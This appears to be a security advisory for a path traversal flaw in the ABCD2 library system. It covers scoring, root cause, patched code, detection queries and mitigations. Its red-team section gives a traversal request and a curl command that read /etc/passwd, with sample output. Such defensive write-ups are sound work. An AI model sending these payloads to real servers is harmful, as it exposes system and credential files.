CVE-2024-8410
Executive Summary
CVE-2024-8410 is a path traversal vulnerability in the ABCD2 library management system, up to version 2.2.0-beta-1. The flaw exists in the /abcd/opac/php/otros_sitios.php file, where the sitio parameter is not properly sanitized, allowing an attacker to read arbitrary files on the server. The vulnerability is remotely exploitable without authentication, and a proof-of-concept has been publicly disclosed. The vendor was contacted but did not respond, leaving the software unpatched.

Supply Chain & Package Security
This vulnerability is not related to NPM, PyPI, Go, or Ruby packages. It affects a standalone PHP application (ABCD2). No supply chain implications are identified.
CVSS Breakdown & Threat Level
- CVSS Score: 0.0 (NVD) / Adjusted: 5.3 (Medium)
- Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Confidentiality: Low (file read)
- Integrity: None
- Availability: None
Threat Level: Medium. While the impact is limited to file disclosure, the lack of authentication and public exploit increases the risk.
Deep Dive & Mechanics
The vulnerability is a classic path traversal (directory traversal) in the otros_sitios.php script. The sitio parameter is used to include or read a file path without proper validation. An attacker can supply ../ sequences to escape the intended directory and read arbitrary files, such as /etc/passwd or application configuration files.
Root Cause: The application does not filter or sanitize the sitio parameter, allowing path traversal sequences.
Attack Flow:
- Attacker sends a GET request to
/abcd/opac/php/otros_sitios.php?sitio=../../../etc/passwd. - The server reads the file and returns its contents in the response.
- No authentication is required.
Vulnerable vs. Patched Code
Vulnerable Code (conceptual):
<?php
$sitio = $_GET['sitio'];
include($sitio); // or readfile($sitio);
?>
Patched Code (recommended):
<?php
$sitio = $_GET['sitio'];
$allowed_path = realpath('/var/www/abcd/allowed_sites/');
$requested_path = realpath($allowed_path . '/' . $sitio);
if (strpos($requested_path, $allowed_path) === 0) {
include($requested_path);
} else {
die('Invalid path');
}
?>
Exploitation & Lab Setup
Red Team
Prerequisites:
- Target running ABCD2 <= 2.2.0-beta-1
- Network access to the web interface
Exploit Steps:
- Identify the vulnerable endpoint:
/abcd/opac/php/otros_sitios.php - Craft a path traversal payload:
GET /abcd/opac/php/otros_sitios.php?sitio=../../../etc/passwd HTTP/1.1 Host: target.com - Observe the response containing the file contents.
Example cURL command:
curl -v "http://target.com/abcd/opac/php/otros_sitios.php?sitio=../../../etc/passwd"
Expected Output:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
Blue Team
Detection:
- Monitor for requests containing
../in thesitioparameter. - Look for unusual file reads (e.g.,
/etc/passwd,/etc/shadow).
Hunting Query (Splunk):
index=web sourcetype=access_combined uri_path="/abcd/opac/php/otros_sitios.php" uri_query=*sitio* | regex uri_query="\.\./"
Mitigation:
- Apply input validation and whitelist allowed paths.
- Use a Web Application Firewall (WAF) to block path traversal patterns.
- If possible, disable the vulnerable script until a patch is available.
Indicators of Compromise (IOCs)
Network:
- HTTP requests to
/abcd/opac/php/otros_sitios.phpwithsitioparameter containing../ - Outbound connections from the server to attacker-controlled hosts (if file content is exfiltrated)
- HTTP requests to
File System:
- Unexpected access to
/etc/passwd,/etc/shadow, or application configuration files
- Unexpected access to
Logs:
- Web server logs showing
404or200responses for path traversal attempts
- Web server logs showing

Remediation & Mitigation
Immediate Actions:
- Disable the vulnerable script if not required: Remove or rename
otros_sitios.php. - Apply input validation to the
sitioparameter: Whitelist allowed paths or use a basename filter. - Use a WAF to block path traversal patterns (e.g.,
../,..\\, URL-encoded variants).
Long-term Fix:
- The vendor has not responded. Consider migrating to a supported library management system.
- If you must continue using ABCD2, implement a custom patch as shown in the "Vulnerable vs. Patched Code" section.
Workaround:
- Restrict access to the
/abcd/opac/php/directory via.htaccessor web server configuration:<Directory "/var/www/html/abcd/opac/php/"> Require ip 192.168.0.0/16 </Directory>
